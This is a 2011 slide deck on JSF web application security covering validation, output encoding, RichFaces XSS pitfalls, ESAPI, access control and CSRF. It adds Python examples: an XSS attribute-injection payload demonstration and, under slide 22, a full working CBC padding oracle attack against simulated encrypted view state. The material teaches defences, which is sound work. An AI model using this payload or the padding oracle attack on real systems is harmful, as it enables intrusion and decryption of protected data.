JSF Security
SOURCE Seattle 2011 - Krishna Raja
1.
JSF Security
© 2011 Security Compass inc.
2.
JSF Input Validation
[Diagram: untrusted inputs such as "abcd", "<script>" and "24c;--" pass through a validation step before reaching the application as validated input]
3.
MyFaces: validateRegExpr Tag
Using the Apache Tomahawk tag library:

    <%@ taglib uri="http://myfaces.apache.org/tomahawk" prefix="t" %>
    <h:outputLabel for="zip1" value="Zip"/>
    <t:inputText value="#{order.zipCode}" id="zip1">
      <t:validateRegExpr pattern="\d{5}" message="ZIP Code must be 5 digits"/>
    </t:inputText>
4.
Facelets Implementation

    <html ... xmlns:ui="http://java.sun.com/jsf/facelets"
              xmlns:t="http://myfaces.apache.org/tomahawk">
    <h:inputText type="text" id="val" value="#{SimpleBean.val}" required="true">
      <t:validateRegExpr pattern="[a-zA-Z]{1,100}" />
    </h:inputText>
5.
Demo: Facelets validation
6.
Mojarra Validators

    xmlns:mj="http://mojarra.dev.java.net/mojarra_ext"
    <h:inputText type="text" id="val" value="#{SimpleBean.val}" required="true">
      <mj:regexValidator pattern="[a-zA-Z]{1,50}"/>
    </h:inputText>

There is also <mj:creditCardValidator/>.
7.
JSF 2.0 Validators
• Part of the JSF 2.0 core tag library
• Can leverage:
  – <f:validateLength .../>
  – <f:validateLongRange .../>
  – <f:validateDoubleRange .../>
  – <f:validateRegex pattern="..."/>
8.
Demo: JSF 2.0 Validators
9.
Other JSF Validation Techniques
• Validation in the action controller
  – Validation tied closely to business logic
  – Dependencies between different fields
• Custom validation methods
  – For more complex validation (e.g. when no built-in JSF validator suits your need)
10.
Output Encoding in JSF
[Diagram: a value such as <script>alert('xss') passes through output encoding, which neutralises the metacharacters < > ( ' )]
11.
<h:outputText> & <h:outputFormat>

    <h:outputText value="#{param.name}"/>
    <h:outputFormat value="#{param.name}"/>

The escape attribute is set to "true" by default.
12.
Output Encoding with Facelets

    <ui:define name="body">
      This will safely encode as an HTML element in a Facelet:
      <h:outputText value="#{SimpleBean.val}">
      </h:outputText>
    </ui:define>

The EL expression is automatically encoded.
13.
But there's a problem ...
• <h:outputText> and <h:outputFormat> cannot be used safely within:
  – an HTML attribute
  – JavaScript or CSS
  The HTML-body escaping they apply does not neutralise every character that ends an attribute value or a JavaScript string literal.
• Similar problem with Facelets ${bean.name}
14.
Problems with RichFaces
• Some tags can lead to XSS
• Never use user-supplied data with:
  – <a4j:loadScript>
  – <a4j:loadStyle>
  – <rich:componentControl>
• Known vulnerabilities exist with: <rich:editor>, <rich:effect>, <rich:gmap>, <rich:virtualEarth>
15.
Solution: OWASP ESAPI EL

    <p>
      <input type="text" value="${esapi:encodeForHTMLAttribute(dangerous)}"/>
    </p>
    <p>
      <script language="javascript">
        var str='${esapi:encodeForJavaScript(dangerous)}';
      </script>
    </p>

The output of encodeForJavaScript is meant to sit inside a quoted JavaScript string literal, so the EL expression is wrapped in quotes.
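The contrast between slide 13 and slide 15, as an added example that is not from the talk or from ESAPI: HTML-body escaping of the kind <h:outputText> applies leaves an unquoted attribute open to attacker-supplied attributes, while an allowlist attribute encoder does not. The two encoders below are Python models of what esapi:encodeForHTMLAttribute and esapi:encodeForJavaScript do, written for this page; html_body_escape (Python's html.escape) stands in for <h:outputText>'s escaping, and PAYLOAD is a constructed attacker value.

```python
import html
import string
from html.parser import HTMLParser

_SAFE = frozenset(string.ascii_letters + string.digits)


def html_body_escape(value: str) -> str:
    """Stand-in for the escaping <h:outputText escape="true"> applies: & < > " ' become entities."""
    return html.escape(value, quote=True)


def encode_for_html_attribute(value: str) -> str:
    """Model of esapi:encodeForHTMLAttribute (not ESAPI's code): everything outside
    [A-Za-z0-9] becomes a numeric entity, so nothing can end an attribute value."""
    return "".join(c if c in _SAFE else f"&#x{ord(c):x};" for c in value)


def encode_for_javascript(value: str) -> str:
    """Model of esapi:encodeForJavaScript (not ESAPI's code): everything outside
    [A-Za-z0-9] becomes a \\xHH or \\uHHHH escape, inert inside a quoted JS string."""
    out = []
    for c in value:
        if c in _SAFE:
            out.append(c)
        elif ord(c) < 0x100:
            out.append(f"\\x{ord(c):02X}")
        else:
            out.append(f"\\u{ord(c):04X}")
    return "".join(out)


class _InputAttributes(HTMLParser):
    """Records the attribute names a browser-like parser sees on the <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.names = [name for name, _ in attrs]


def attributes_seen(markup: str) -> list:
    parser = _InputAttributes()
    parser.feed(markup)
    parser.close()
    return parser.names


def render_unquoted_attribute(encoder, untrusted: str) -> str:
    """The template as written when the developer forgets the quotes around value."""
    return f'<input type="text" value={encoder(untrusted)}>'


# Constructed attacker input: contains none of & < > " ' so body escaping leaves it untouched.
PAYLOAD = "x onfocus=alert(1) autofocus"


def injected_attributes(encoder) -> list:
    """Attribute names beyond the intended type/value, i.e. what the attacker smuggled in."""
    rendered = render_unquoted_attribute(encoder, PAYLOAD)
    return [n for n in attributes_seen(rendered) if n not in ("type", "value")]


if __name__ == "__main__":
    for enc in (html_body_escape, encode_for_html_attribute):
        print(enc.__name__, render_unquoted_attribute(enc, PAYLOAD), injected_attributes(enc))
```

With html_body_escape the rendered tag acquires onfocus and autofocus attributes; with encode_for_html_attribute the same payload stays inside the value, because the space and the equals sign that would have terminated the attribute are entity-encoded.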
16.
Demo: ESAPI encoding
17.
Page Level Authorization
18.
ESAPI AccessController
• Interface that provides access control for:
  – URLs
  – Business functions
  – Data, services & files
• Contains: assertAuthorizedForURL(String url)
19.
Demo: AccessController
20.
Defending Against CSRF
Anti-CSRF tokens
21.
What about JSF "view state"?
• javax.faces.STATE_SAVING_METHOD
  – Can save and restore the state of the view between requests to the server
STATE_SAVING_METHOD + JSESSIONID = Anti-CSRF Token ???
22.
Problem: Padding Oracle Attack
• Recently discovered exploit against CBC-mode encryption with PKCS#5 padding
• Incorrect padding results in javax.crypto.BadPaddingException; an attacker who can distinguish that failure from any other response has an oracle
• Can be used to decrypt the client-side saved view state (the value STATE_SAVING_METHOD=client places in the page)
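The attack the slide refers to, worked through as an added example (not from the talk): a server stores CBC-encrypted, PKCS#5-padded state on the client and answers with a distinguishable error when the padding is wrong; the attacker recovers the plaintext with nothing but those yes/no answers. The 64-bit Feistel cipher here is a constructed stand-in for the server's real block cipher (8-byte blocks match PKCS#5), and the key, IV and view_state value are constructed sample data; the padding_is_valid function plays the role of the server leaking BadPaddingException.

```python
import hashlib

BLOCK = 8  # PKCS#5 is defined for 8-byte blocks; the view state is padded to this size


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- a toy 64-bit Feistel block cipher (constructed stand-in for the server's real cipher) ---
def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for rnd in range(8):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for rnd in reversed(range(8)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r


# --- PKCS#5 padding and CBC mode, as the server uses them ---
def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("BadPaddingException")  # the failure the server leaks
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


# --- the oracle: the only server behaviour the attacker can observe ---
def padding_is_valid(key: bytes, iv: bytes, ct: bytes) -> bool:
    try:
        unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False


# --- the attack: recover one block from the oracle's yes/no answers alone ---
def recover_block(oracle, prev: bytes, block: bytes) -> bytes:
    inter = bytearray(BLOCK)  # D_key(block), recovered from the last byte backwards
    for j in range(BLOCK - 1, -1, -1):
        p = BLOCK - j  # padding value we force onto bytes j..BLOCK-1
        for g in range(256):
            forged = bytearray(BLOCK)
            forged[j] = g
            for k in range(j + 1, BLOCK):
                forged[k] = inter[k] ^ p  # already-known bytes decrypt to p
            if not oracle(bytes(forged), block):
                continue
            if j == BLOCK - 1:
                # a last-byte hit may be 0x02 0x02 by accident: perturb byte 6 and re-check
                forged[j - 1] ^= 0xFF
                if not oracle(bytes(forged), block):
                    continue
            inter[j] = g ^ p
            break
        else:
            raise RuntimeError("oracle never accepted a guess")
    return xor(bytes(inter), prev)


def padding_oracle_attack(oracle, iv: bytes, ct: bytes) -> bytes:
    plaintext, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        plaintext += recover_block(oracle, prev, ct[i:i + BLOCK])
        prev = ct[i:i + BLOCK]
    return unpad(plaintext)


def demo() -> bytes:
    key = hashlib.sha256(b"server-side secret").digest()  # constructed; never seen by the attacker
    iv = bytes(range(BLOCK))                               # constructed; travels with the ciphertext
    view_state = b"viewId=/checkout.xhtml;role=admin"     # constructed stand-in for serialized view state
    ct = cbc_encrypt(key, iv, pad(view_state))
    oracle = lambda forged_iv, block: padding_is_valid(key, forged_iv, block)
    return padding_oracle_attack(oracle, iv, ct)


if __name__ == "__main__":
    print(demo())
```

The attacker never touches the key: each ciphertext block is sent back as a one-block message with a forged IV, and at most 256 oracle queries per byte turn "padding OK / padding bad" into the block's plaintext. The defence is the one the next slide takes: do not rely on the encrypted view state as an anti-CSRF secret, and, for the view state itself, authenticate it (a MAC checked before decryption) so that a tampered ciphertext is rejected uniformly instead of leaking a padding error.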
23.
Solution: OWASP CSRFGuard
• Version 3 recently released!
• Library that injects per-session or per-request tokens into HTML
• Can use 2 strategies to inject the token:
  – JavaScript DOM manipulation
  – JSP tag library
24.
Demo: Anti-CSRF Tokens